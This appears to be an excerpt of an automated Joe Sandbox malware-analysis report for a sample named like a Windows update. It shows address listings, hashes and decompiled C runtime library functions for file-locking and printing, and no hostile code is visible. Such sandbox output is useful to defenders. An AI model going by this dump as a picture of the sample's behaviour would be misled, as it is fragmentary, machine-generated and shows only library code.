                                                                                                                    0x002cf729
                                                                                                                    0x002cf72a
                                                                                                                    0x002cf72b
                                                                                                                    0x002cf72c
                                                                                                                    0x002cf72d
                                                                                                                    0x002cf72e
                                                                                                                    0x002cf72f
                                                                                                                    0x002cf730
                                                                                                                    0x002cf731
                                                                                                                    0x002cf732
                                                                                                                    0x002cf733
                                                                                                                    0x002cf734
                                                                                                                    0x002cf735
                                                                                                                    0x002cf736
                                                                                                                    0x002cf737
                                                                                                                    0x002cf738
                                                                                                                    0x002cf747
                                                                                                                    0x002cf74a
                                                                                                                    0x002cf74b
                                                                                                                    0x002cf75a
                                                                                                                    0x002cf761
                                                                                                                    0x002cf766
                                                                                                                    0x002cf769
                                                                                                                    0x002cf76b
                                                                                                                    0x002cf76d
                                                                                                                    0x002cf771
                                                                                                                    0x002cf777
                                                                                                                    0x002cf780
                                                                                                                    0x002cf779
                                                                                                                    0x002cf779
                                                                                                                    0x002cf779
                                                                                                                    0x002cf78b
                                                                                                                    0x002cf790
                                                                                                                    0x002cf7a2
                                                                                                                    0x002cf7a8
                                                                                                                    0x002cf7aa
                                                                                                                    0x002cf7d7
                                                                                                                    0x002cf7ed
                                                                                                                    0x002cf805
                                                                                                                    0x002cf81b
                                                                                                                    0x002cf833
                                                                                                                    0x002cf839
                                                                                                                    0x002cf83e
                                                                                                                    0x002cf841
                                                                                                                    0x002cf843
                                                                                                                    0x00000000
                                                                                                                    0x002cf849
                                                                                                                    0x002cf849
                                                                                                                    0x002cf84f
                                                                                                                    0x002cf851
                                                                                                                    0x00000000
                                                                                                                    0x002cf857
                                                                                                                    0x002cf857
                                                                                                                    0x002cf85e
                                                                                                                    0x002cf863
                                                                                                                    0x002cf864
                                                                                                                    0x002cf869
                                                                                                                    0x002cf86c
                                                                                                                    0x002cf86e
                                                                                                                    0x002cf9e9
                                                                                                                    0x002cf9e9
                                                                                                                    0x002cf9ef
                                                                                                                    0x002cf9fc
                                                                                                                    0x002cf9fd
                                                                                                                    0x002cf9ff
                                                                                                                    0x002cfa08
                                                                                                                    0x002cf877
                                                                                                                    0x002cf877
                                                                                                                    0x002cf883
                                                                                                                    0x002cf888
                                                                                                                    0x002cf891
                                                                                                                    0x002cf893
                                                                                                                    0x002cf8b4
                                                                                                                    0x002cf8b9
                                                                                                                    0x002cf8bc
                                                                                                                    0x002cf8be
                                                                                                                    0x002cf90a
                                                                                                                    0x002cf90f
                                                                                                                    0x002cf912
                                                                                                                    0x002cf914
                                                                                                                    0x002cf916
                                                                                                                    0x002cf916
                                                                                                                    0x002cf919
                                                                                                                    0x002cf91f
                                                                                                                    0x002cf927
                                                                                                                    0x002cf927
                                                                                                                    0x002cf929
                                                                                                                    0x002cf92a
                                                                                                                    0x002cf92a
                                                                                                                    0x002cf930
                                                                                                                    0x002cf931
                                                                                                                    0x002cf937
                                                                                                                    0x002cfa09
                                                                                                                    0x002cfa0e
                                                                                                                    0x002cfa0f
                                                                                                                    0x002cfa10
                                                                                                                    0x002cfa11
                                                                                                                    0x002cfa12
                                                                                                                    0x002cfa13
                                                                                                                    0x002cfa14
                                                                                                                    0x002cfa15
                                                                                                                    0x002cfa16
                                                                                                                    0x002cfa17
                                                                                                                    0x002cfa1a
                                                                                                                    0x002cfa1b
                                                                                                                    0x002cfa1c
                                                                                                                    0x002cfa21
                                                                                                                    0x002cfa24
                                                                                                                    0x002cfa2d
                                                                                                                    0x002cfa32
                                                                                                                    0x002cfa37
                                                                                                                    0x002cfa40
                                                                                                                    0x002cfa45
                                                                                                                    0x002cfa4a
                                                                                                                    0x002cfa53
                                                                                                                    0x002cfa58
                                                                                                                    0x002cfa5d
                                                                                                                    0x002cfa69
                                                                                                                    0x002cfa6e
                                                                                                                    0x002cfa73
                                                                                                                    0x002cfa7b
                                                                                                                    0x002cfa85
                                                                                                                    0x002cfa8d
                                                                                                                    0x002cfa90
                                                                                                                    0x002cfa9b
                                                                                                                    0x002cfaa6
                                                                                                                    0x002cfaab
                                                                                                                    0x002cfaae
                                                                                                                    0x002cfab6
                                                                                                                    0x002cfabb
                                                                                                                    0x002cfabf
                                                                                                                    0x002cfac8
                                                                                                                    0x002cfacd
                                                                                                                    0x002cfad2
                                                                                                                    0x002cfadb
                                                                                                                    0x002cfae0
                                                                                                                    0x002cfae5
                                                                                                                    0x002cfaf1
                                                                                                                    0x002cfaf6
                                                                                                                    0x002cfafb
                                                                                                                    0x002cfb04
                                                                                                                    0x002cfb0c
                                                                                                                    0x002cfb11
                                                                                                                    0x002cfb11
                                                                                                                    0x002cfb13
                                                                                                                    0x002cfb15
                                                                                                                    0x002cfb1b
                                                                                                                    0x002cf93d
                                                                                                                    0x002cf93d
                                                                                                                    0x002cf93e
                                                                                                                    0x002cf951
                                                                                                                    0x002cf956
                                                                                                                    0x002cf95c
                                                                                                                    0x002cf95f
                                                                                                                    0x002cf961
                                                                                                                    0x002cf961
                                                                                                                    0x002cf967
                                                                                                                    0x002cf967
                                                                                                                    0x002cf969
                                                                                                                    0x002cf96a
                                                                                                                    0x002cf96a
                                                                                                                    0x002cf96e
                                                                                                                    0x002cf96e
                                                                                                                    0x002cf970
                                                                                                                    0x002cf976
                                                                                                                    0x002cf979
                                                                                                                    0x002cf979
                                                                                                                    0x002cf97b
                                                                                                                    0x002cf97c
                                                                                                                    0x002cf97c
                                                                                                                    0x002cf980
                                                                                                                    0x002cf980
                                                                                                                    0x002cf982
                                                                                                                    0x002cf984
                                                                                                                    0x002cf984
                                                                                                                    0x002cf987
                                                                                                                    0x002cf987
                                                                                                                    0x002cf989
                                                                                                                    0x002cf98a
                                                                                                                    0x002cf98a
                                                                                                                    0x002cf98e
                                                                                                                    0x002cf995
                                                                                                                    0x002cf998
                                                                                                                    0x002cf99d
                                                                                                                    0x002cf99f
                                                                                                                    0x002cf9a2
                                                                                                                    0x002cf9a4
                                                                                                                    0x002cf9af
                                                                                                                    0x002cf9bb
                                                                                                                    0x002cf9c9
                                                                                                                    0x002cf9d5
                                                                                                                    0x002cf9da
                                                                                                                    0x002cf9e0
                                                                                                                    0x002cf9e5
                                                                                                                    0x002cf9e5
                                                                                                                    0x002cf9e8
                                                                                                                    0x00000000
                                                                                                                    0x002cf9e8
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x002cf895
                                                                                                                    0x002cf89b
                                                                                                                    0x002cf8a0
                                                                                                                    0x002cf8a3
                                                                                                                    0x002cf8a5
                                                                                                                    0x002cf8a7
                                                                                                                    0x002cf8a7
                                                                                                                    0x00000000
                                                                                                                    0x002cf8a5
                                                                                                                    0x00000000
                                                                                                                    0x002cf8c0
                                                                                                                    0x002cf8c0
                                                                                                                    0x002cf8cc
                                                                                                                    0x002cf8d1
                                                                                                                    0x002cf8d2
                                                                                                                    0x002cf8d7
                                                                                                                    0x002cf8da
                                                                                                                    0x002cf8da
                                                                                                                    0x002cf8de
                                                                                                                    0x002cf8e4
                                                                                                                    0x002cf8ee
                                                                                                                    0x002cf8ef
                                                                                                                    0x002cf8f3
                                                                                                                    0x002cf8fd
                                                                                                                    0x002cf8fd
                                                                                                                    0x002cf86e
                                                                                                                    0x002cf851
                                                                                                                    0x002cf7ac
                                                                                                                    0x002cf7ac
                                                                                                                    0x002cf7b2
                                                                                                                    0x002cf7b2
                                                                                                                    0x002cf7b5
                                                                                                                    0x002cf7b9
                                                                                                                    0x002cf7c3
                                                                                                                    0x002cf7c3
                                                                                                                    0x002cf6fc
                                                                                                                    0x002cf6fc
                                                                                                                    0x00000000
                                                                                                                    0x002cf6fc
                                                                                                                    0x002cf6fa
                                                                                                                    0x002cf69a
                                                                                                                    0x002cf626
                                                                                                                    0x002cf5f9
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • _wprintf.LIBCMT ref: 002CF406
                                                                                                                    • _wprintf.LIBCMT ref: 002CF410
                                                                                                                    • _wprintf.LIBCMT ref: 002CF430
                                                                                                                    • _wprintf.LIBCMT ref: 002CF526
                                                                                                                    • _wprintf.LIBCMT ref: 002CF530
                                                                                                                      • Part of subcall function 002CF0B7: _wprintf.LIBCMT ref: 002CF100
                                                                                                                      • Part of subcall function 002CF0B7: _wprintf.LIBCMT ref: 002CF114
                                                                                                                      • Part of subcall function 002CF0B7: _wprintf.LIBCMT ref: 002CF123
                                                                                                                      • Part of subcall function 002CF0B7: _wprintf.LIBCMT ref: 002CF139
                                                                                                                      • Part of subcall function 002CF0B7: _wprintf.LIBCMT ref: 002CF154
                                                                                                                      • Part of subcall function 002CF0B7: _wprintf.LIBCMT ref: 002CF15E
                                                                                                                      • Part of subcall function 002CF0B7: _wprintf.LIBCMT ref: 002CF168
                                                                                                                      • Part of subcall function 002CF0B7: _wprintf.LIBCMT ref: 002CF177
                                                                                                                      • Part of subcall function 002CF0B7: _wprintf.LIBCMT ref: 002CF181
                                                                                                                      • Part of subcall function 002CF0B7: _wprintf.LIBCMT ref: 002CF190
                                                                                                                      • Part of subcall function 002CF0B7: _wprintf.LIBCMT ref: 002CF19A
                                                                                                                      • Part of subcall function 002CF0B7: _wprintf.LIBCMT ref: 002CF1A9
                                                                                                                      • Part of subcall function 002CF0B7: _wprintf.LIBCMT ref: 002CF1B3
                                                                                                                      • Part of subcall function 002CEE77: vswprintf.LIBCMT ref: 002CEE9A
                                                                                                                      • Part of subcall function 002CEE77: _wprintf.LIBCMT ref: 002CEEDB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _wprintf$vswprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3567883335-0
                                                                                                                    • Opcode ID: cc4837d878c03868926272d2bd919dc98e7aac5c93c474bb8730b9a8a55dd63a
                                                                                                                    • Instruction ID: 3245e1d47e738afd6a6a0ffb1f9edc25a1f78de1d6fee88bb97d5d607238721e
                                                                                                                    • Opcode Fuzzy Hash: cc4837d878c03868926272d2bd919dc98e7aac5c93c474bb8730b9a8a55dd63a
                                                                                                                    • Instruction Fuzzy Hash: 98417971911325F6DB307BF46D47FAE33199F01721F20872AFB1CA50C2EA6599148977
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 003BA643 Relevance: 7.6, APIs: 5, Instructions: 118COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 64%
                                                                                                                    			E003BA643(void* __ebx, void* __ecx, void* __edx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t51;
				signed int _t54;
				signed int _t62;
				signed int _t78;
				signed int _t84;
				signed int _t92;
				signed int _t94;
				void* _t99;
				void* _t100;

				_t100 = __eflags;
				_push(0x18);
				_push(0x481128);
				E003B28FC(__ebx, __edi, __esi);
				_t94 = __esi | 0xffffffff;
				 *(_t99 - 0x1c) = _t94;
				 *(_t99 - 0x24) =  *(_t99 - 0x24) & 0x00000000;
				_push(0xb);
				_t51 = E003B22F5(__ebx, __ecx, __edx, __edi, _t94, _t100);
				if(_t51 != 0) {
					E003B226D(0xb);
					 *(_t99 - 4) =  *(_t99 - 4) & 0x00000000;
					_t78 = 0;
					__eflags = 0;
					while(1) {
						 *(_t99 - 0x28) = _t78;
						__eflags = _t78 - 0x40;
						if(_t78 >= 0x40) {
							break;
						}
						_t92 =  *(0x48b030 + _t78 * 4);
						__eflags = _t92;
						if(_t92 == 0) {
							_t84 = E003B252D(0x20, 0x40);
							 *(_t99 - 0x20) = _t84;
							__eflags = _t84;
							if(_t84 == 0) {
								break;
							}
							 *(0x48b030 + _t78 * 4) = _t84;
							 *0x48b36c =  *0x48b36c + 0x20;
							__eflags =  *0x48b36c;
							while(1) {
								__eflags = _t84 -  *(0x48b030 + _t78 * 4) + 0x800;
								if(__eflags >= 0) {
									break;
								}
								 *((short*)(_t84 + 4)) = 0xa00;
								 *_t84 =  *_t84 | 0xffffffff;
								 *(_t84 + 8) =  *(_t84 + 8) & 0x00000000;
								_t84 = _t84 + 0x40;
								 *(_t99 - 0x20) = _t84;
							}
							_t94 = _t78 << 5;
							 *(_t99 - 0x1c) = _t94;
							 *((char*)( *((intOrPtr*)(0x48b030 + (_t94 >> 5) * 4)) + ((_t94 & 0x0000001f) << 6) + 4)) = 1;
							_push(_t94);
							_t62 = E003BA5B7(_t78, _t92, _t94, __eflags);
							__eflags = _t62;
							if(_t62 == 0) {
								_t94 = _t94 | 0xffffffff;
								__eflags = _t94;
								 *(_t99 - 0x1c) = _t94;
							}
							break;
						} else {
							goto L5;
						}
						while(1) {
							L5:
							 *(_t99 - 0x20) = _t92;
							__eflags = _t92 -  *(0x48b030 + _t78 * 4) + 0x800;
							if(_t92 >=  *(0x48b030 + _t78 * 4) + 0x800) {
								break;
							}
							__eflags =  *(_t92 + 4) & 0x00000001;
							if(( *(_t92 + 4) & 0x00000001) != 0) {
								L14:
								_t92 = _t92 + 0x40;
								continue;
							}
							__eflags =  *(_t92 + 8);
							if( *(_t92 + 8) == 0) {
								E003B226D(0xa);
								 *(_t99 - 4) = 1;
								__eflags =  *(_t92 + 8);
								if( *(_t92 + 8) == 0) {
									_t18 = _t92 + 0xc; // 0x8000000c
									 *0x4741bc(_t18, 0xfa0);
									_t19 = _t92 + 8;
									 *_t19 =  *(_t92 + 8) + 1;
									__eflags =  *_t19;
								}
								_t21 = _t99 - 4;
								 *_t21 =  *(_t99 - 4) & 0x00000000;
								__eflags =  *_t21;
								E003BA717();
							}
							__eflags =  *(_t99 - 0x24);
							if( *(_t99 - 0x24) == 0) {
								_t24 = _t92 + 0xc; // 0x8000000c
								 *0x47409c(_t24);
								__eflags =  *(_t92 + 4) & 0x00000001;
								if(( *(_t92 + 4) & 0x00000001) == 0) {
									__eflags =  *(_t99 - 0x24);
									if( *(_t99 - 0x24) != 0) {
										goto L14;
									}
									 *(_t92 + 4) = 1;
									 *_t92 =  *_t92 | 0xffffffff;
									_t94 = (_t92 -  *(0x48b030 + _t78 * 4) >> 6) + (_t78 << 5);
									__eflags = _t94;
									 *(_t99 - 0x1c) = _t94;
									break;
								}
								_t28 = _t92 + 0xc; // 0x8000000c
								 *0x4740a0(_t28);
							}
							goto L14;
						}
						__eflags = _t94 - 0xffffffff;
						if(_t94 != 0xffffffff) {
							break;
						}
						_t78 = _t78 + 1;
					}
					 *(_t99 - 4) = 0xfffffffe;
					E003BA7DF();
					_t54 = _t94;
					L26:
					return E003B2941(_t54);
				}
				_t54 = _t51 | _t94;
				goto L26;
			}












                                                                                                                    0x003ba643
                                                                                                                    0x003ba643
                                                                                                                    0x003ba645
                                                                                                                    0x003ba64a
                                                                                                                    0x003ba64f
                                                                                                                    0x003ba652
                                                                                                                    0x003ba655
                                                                                                                    0x003ba659
                                                                                                                    0x003ba65b
                                                                                                                    0x003ba663
                                                                                                                    0x003ba66e
                                                                                                                    0x003ba674
                                                                                                                    0x003ba678
                                                                                                                    0x003ba678
                                                                                                                    0x003ba67a
                                                                                                                    0x003ba67a
                                                                                                                    0x003ba67d
                                                                                                                    0x003ba680
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x003ba686
                                                                                                                    0x003ba68d
                                                                                                                    0x003ba68f
                                                                                                                    0x003ba75a
                                                                                                                    0x003ba75c
                                                                                                                    0x003ba75f
                                                                                                                    0x003ba761
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x003ba763
                                                                                                                    0x003ba76a
                                                                                                                    0x003ba76a
                                                                                                                    0x003ba771
                                                                                                                    0x003ba77d
                                                                                                                    0x003ba77f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x003ba781
                                                                                                                    0x003ba787
                                                                                                                    0x003ba78a
                                                                                                                    0x003ba78e
                                                                                                                    0x003ba791
                                                                                                                    0x003ba791
                                                                                                                    0x003ba798
                                                                                                                    0x003ba79b
                                                                                                                    0x003ba7b2
                                                                                                                    0x003ba7b7
                                                                                                                    0x003ba7b8
                                                                                                                    0x003ba7be
                                                                                                                    0x003ba7c0
                                                                                                                    0x003ba7c2
                                                                                                                    0x003ba7c2
                                                                                                                    0x003ba7c5
                                                                                                                    0x003ba7c5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x003ba695
                                                                                                                    0x003ba695
                                                                                                                    0x003ba695
                                                                                                                    0x003ba6a4
                                                                                                                    0x003ba6a6
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x003ba6ac
                                                                                                                    0x003ba6b0
                                                                                                                    0x003ba709
                                                                                                                    0x003ba709
                                                                                                                    0x00000000
                                                                                                                    0x003ba709
                                                                                                                    0x003ba6b2
                                                                                                                    0x003ba6b6
                                                                                                                    0x003ba6ba
                                                                                                                    0x003ba6c0
                                                                                                                    0x003ba6c7
                                                                                                                    0x003ba6cb
                                                                                                                    0x003ba6d2
                                                                                                                    0x003ba6d6
                                                                                                                    0x003ba6dc
                                                                                                                    0x003ba6dc
                                                                                                                    0x003ba6dc
                                                                                                                    0x003ba6dc
                                                                                                                    0x003ba6df
                                                                                                                    0x003ba6df
                                                                                                                    0x003ba6df
                                                                                                                    0x003ba6e3
                                                                                                                    0x003ba6e3
                                                                                                                    0x003ba6eb
                                                                                                                    0x003ba6ed
                                                                                                                    0x003ba6ef
                                                                                                                    0x003ba6f3
                                                                                                                    0x003ba6f9
                                                                                                                    0x003ba6fd
                                                                                                                    0x003ba723
                                                                                                                    0x003ba725
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x003ba727
                                                                                                                    0x003ba72b
                                                                                                                    0x003ba73f
                                                                                                                    0x003ba73f
                                                                                                                    0x003ba741
                                                                                                                    0x00000000
                                                                                                                    0x003ba741
                                                                                                                    0x003ba6ff
                                                                                                                    0x003ba703
                                                                                                                    0x003ba703
                                                                                                                    0x00000000
                                                                                                                    0x003ba6ed
                                                                                                                    0x003ba744
                                                                                                                    0x003ba747
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x003ba749
                                                                                                                    0x003ba749
                                                                                                                    0x003ba7c8
                                                                                                                    0x003ba7cf
                                                                                                                    0x003ba7d4
                                                                                                                    0x003ba7d6
                                                                                                                    0x003ba7db
                                                                                                                    0x003ba7db
                                                                                                                    0x003ba665
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • __mtinitlocknum.LIBCMT ref: 003BA65B
                                                                                                                      • Part of subcall function 003B22F5: __FF_MSGBANNER.LIBCMT ref: 003B230A
                                                                                                                      • Part of subcall function 003B22F5: __NMSG_WRITE.LIBCMT ref: 003B2311
                                                                                                                      • Part of subcall function 003B22F5: __malloc_crt.LIBCMT ref: 003B2331
                                                                                                                    • __lock.LIBCMT ref: 003BA66E
                                                                                                                    • __lock.LIBCMT ref: 003BA6BA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: __lock$__malloc_crt__mtinitlocknum
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1818312207-0
                                                                                                                    • Opcode ID: 984fdba79346da7c941f07d78ca38673703a021201ddbf3c0c4fbfb40fc46d8a
                                                                                                                    • Instruction ID: fe25346c5a5179ea3f8047f9800c21776e38b230ae6359e197d0498fe92072e0
                                                                                                                    • Opcode Fuzzy Hash: 984fdba79346da7c941f07d78ca38673703a021201ddbf3c0c4fbfb40fc46d8a
                                                                                                                    • Instruction Fuzzy Hash: 69415771904F059BDB128FE8D8457DDB7B4AF05328F20432DD625ABAE0EB7498008B85
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00335B33 Relevance: 7.6, APIs: 5, Instructions: 118COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 64%
                                                                                                                    			E00335B33(void* __ebx, void* __ecx, void* __edx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t51;
				signed int _t54;
				signed int _t62;
				signed int _t78;
				signed int _t84;
				signed int _t92;
				signed int _t94;
				void* _t99;
				void* _t100;

				_t100 = __eflags;
				_push(0x18);
				_push(0x47e060);
				E0032EC57(__ebx, __edi, __esi);
				_t94 = __esi | 0xffffffff;
				 *(_t99 - 0x1c) = _t94;
				 *(_t99 - 0x24) =  *(_t99 - 0x24) & 0x00000000;
				_push(0xb);
				_t51 = E0032E4D0(__ebx, __ecx, __edx, __edi, _t94, _t100);
				if(_t51 != 0) {
					E0032E448(0xb);
					 *(_t99 - 4) =  *(_t99 - 4) & 0x00000000;
					_t78 = 0;
					__eflags = 0;
					while(1) {
						 *(_t99 - 0x28) = _t78;
						__eflags = _t78 - 0x40;
						if(_t78 >= 0x40) {
							break;
						}
						_t92 =  *(0x487f50 + _t78 * 4);
						__eflags = _t92;
						if(_t92 == 0) {
							_t84 = E0032E842(0x20, 0x40);
							 *(_t99 - 0x20) = _t84;
							__eflags = _t84;
							if(_t84 == 0) {
								break;
							}
							 *(0x487f50 + _t78 * 4) = _t84;
							 *0x48828c =  *0x48828c + 0x20;
							__eflags =  *0x48828c;
							while(1) {
								__eflags = _t84 -  *(0x487f50 + _t78 * 4) + 0x800;
								if(__eflags >= 0) {
									break;
								}
								 *((short*)(_t84 + 4)) = 0xa00;
								 *_t84 =  *_t84 | 0xffffffff;
								 *(_t84 + 8) =  *(_t84 + 8) & 0x00000000;
								_t84 = _t84 + 0x40;
								 *(_t99 - 0x20) = _t84;
							}
							_t94 = _t78 << 5;
							 *(_t99 - 0x1c) = _t94;
							 *((char*)( *((intOrPtr*)(0x487f50 + (_t94 >> 5) * 4)) + ((_t94 & 0x0000001f) << 6) + 4)) = 1;
							_push(_t94);
							_t62 = E00335AA7(_t78, _t92, _t94, __eflags);
							__eflags = _t62;
							if(_t62 == 0) {
								_t94 = _t94 | 0xffffffff;
								__eflags = _t94;
								 *(_t99 - 0x1c) = _t94;
							}
							break;
						} else {
							goto L5;
						}
						while(1) {
							L5:
							 *(_t99 - 0x20) = _t92;
							__eflags = _t92 -  *(0x487f50 + _t78 * 4) + 0x800;
							if(_t92 >=  *(0x487f50 + _t78 * 4) + 0x800) {
								break;
							}
							__eflags =  *(_t92 + 4) & 0x00000001;
							if(( *(_t92 + 4) & 0x00000001) != 0) {
								L14:
								_t92 = _t92 + 0x40;
								continue;
							}
							__eflags =  *(_t92 + 8);
							if( *(_t92 + 8) == 0) {
								E0032E448(0xa);
								 *(_t99 - 4) = 1;
								__eflags =  *(_t92 + 8);
								if( *(_t92 + 8) == 0) {
									_t18 = _t92 + 0xc; // 0x8000000c
									 *0x4701a8(_t18, 0xfa0);
									_t19 = _t92 + 8;
									 *_t19 =  *(_t92 + 8) + 1;
									__eflags =  *_t19;
								}
								_t21 = _t99 - 4;
								 *_t21 =  *(_t99 - 4) & 0x00000000;
								__eflags =  *_t21;
								E00335C07();
							}
							__eflags =  *(_t99 - 0x24);
							if( *(_t99 - 0x24) == 0) {
								_t24 = _t92 + 0xc; // 0x8000000c
								 *0x47006c(_t24);
								__eflags =  *(_t92 + 4) & 0x00000001;
								if(( *(_t92 + 4) & 0x00000001) == 0) {
									__eflags =  *(_t99 - 0x24);
									if( *(_t99 - 0x24) != 0) {
										goto L14;
									}
									 *(_t92 + 4) = 1;
									 *_t92 =  *_t92 | 0xffffffff;
									_t94 = (_t92 -  *(0x487f50 + _t78 * 4) >> 6) + (_t78 << 5);
									__eflags = _t94;
									 *(_t99 - 0x1c) = _t94;
									break;
								}
								_t28 = _t92 + 0xc; // 0x8000000c
								 *0x470070(_t28);
							}
							goto L14;
						}
						__eflags = _t94 - 0xffffffff;
						if(_t94 != 0xffffffff) {
							break;
						}
						_t78 = _t78 + 1;
					}
					 *(_t99 - 4) = 0xfffffffe;
					E00335CCF();
					_t54 = _t94;
					L26:
					return E0032EC9C(_t54);
				}
				_t54 = _t51 | _t94;
				goto L26;
			}












                                                                                                                    0x00335b33
                                                                                                                    0x00335b33
                                                                                                                    0x00335b35
                                                                                                                    0x00335b3a
                                                                                                                    0x00335b3f
                                                                                                                    0x00335b42
                                                                                                                    0x00335b45
                                                                                                                    0x00335b49
                                                                                                                    0x00335b4b
                                                                                                                    0x00335b53
                                                                                                                    0x00335b5e
                                                                                                                    0x00335b64
                                                                                                                    0x00335b68
                                                                                                                    0x00335b68
                                                                                                                    0x00335b6a
                                                                                                                    0x00335b6a
                                                                                                                    0x00335b6d
                                                                                                                    0x00335b70
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00335b76
                                                                                                                    0x00335b7d
                                                                                                                    0x00335b7f
                                                                                                                    0x00335c4a
                                                                                                                    0x00335c4c
                                                                                                                    0x00335c4f
                                                                                                                    0x00335c51
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00335c53
                                                                                                                    0x00335c5a
                                                                                                                    0x00335c5a
                                                                                                                    0x00335c61
                                                                                                                    0x00335c6d
                                                                                                                    0x00335c6f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00335c71
                                                                                                                    0x00335c77
                                                                                                                    0x00335c7a
                                                                                                                    0x00335c7e
                                                                                                                    0x00335c81
                                                                                                                    0x00335c81
                                                                                                                    0x00335c88
                                                                                                                    0x00335c8b
                                                                                                                    0x00335ca2
                                                                                                                    0x00335ca7
                                                                                                                    0x00335ca8
                                                                                                                    0x00335cae
                                                                                                                    0x00335cb0
                                                                                                                    0x00335cb2
                                                                                                                    0x00335cb2
                                                                                                                    0x00335cb5
                                                                                                                    0x00335cb5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00335b85
                                                                                                                    0x00335b85
                                                                                                                    0x00335b85
                                                                                                                    0x00335b94
                                                                                                                    0x00335b96
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00335b9c
                                                                                                                    0x00335ba0
                                                                                                                    0x00335bf9
                                                                                                                    0x00335bf9
                                                                                                                    0x00000000
                                                                                                                    0x00335bf9
                                                                                                                    0x00335ba2
                                                                                                                    0x00335ba6
                                                                                                                    0x00335baa
                                                                                                                    0x00335bb0
                                                                                                                    0x00335bb7
                                                                                                                    0x00335bbb
                                                                                                                    0x00335bc2
                                                                                                                    0x00335bc6
                                                                                                                    0x00335bcc
                                                                                                                    0x00335bcc
                                                                                                                    0x00335bcc
                                                                                                                    0x00335bcc
                                                                                                                    0x00335bcf
                                                                                                                    0x00335bcf
                                                                                                                    0x00335bcf
                                                                                                                    0x00335bd3
                                                                                                                    0x00335bd3
                                                                                                                    0x00335bdb
                                                                                                                    0x00335bdd
                                                                                                                    0x00335bdf
                                                                                                                    0x00335be3
                                                                                                                    0x00335be9
                                                                                                                    0x00335bed
                                                                                                                    0x00335c13
                                                                                                                    0x00335c15
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00335c17
                                                                                                                    0x00335c1b
                                                                                                                    0x00335c2f
                                                                                                                    0x00335c2f
                                                                                                                    0x00335c31
                                                                                                                    0x00000000
                                                                                                                    0x00335c31
                                                                                                                    0x00335bef
                                                                                                                    0x00335bf3
                                                                                                                    0x00335bf3
                                                                                                                    0x00000000
                                                                                                                    0x00335bdd
                                                                                                                    0x00335c34
                                                                                                                    0x00335c37
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00335c39
                                                                                                                    0x00335c39
                                                                                                                    0x00335cb8
                                                                                                                    0x00335cbf
                                                                                                                    0x00335cc4
                                                                                                                    0x00335cc6
                                                                                                                    0x00335ccb
                                                                                                                    0x00335ccb
                                                                                                                    0x00335b55
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • __mtinitlocknum.LIBCMT ref: 00335B4B
                                                                                                                      • Part of subcall function 0032E4D0: __FF_MSGBANNER.LIBCMT ref: 0032E4E5
                                                                                                                      • Part of subcall function 0032E4D0: __NMSG_WRITE.LIBCMT ref: 0032E4EC
                                                                                                                      • Part of subcall function 0032E4D0: __malloc_crt.LIBCMT ref: 0032E50C
                                                                                                                    • __lock.LIBCMT ref: 00335B5E
                                                                                                                    • __lock.LIBCMT ref: 00335BAA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: __lock$__malloc_crt__mtinitlocknum
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1818312207-0
                                                                                                                    • Opcode ID: ce6aae9b49ed4f2fd07869c2a7d86244dfa9258787175d0d58d33f75fd344ad8
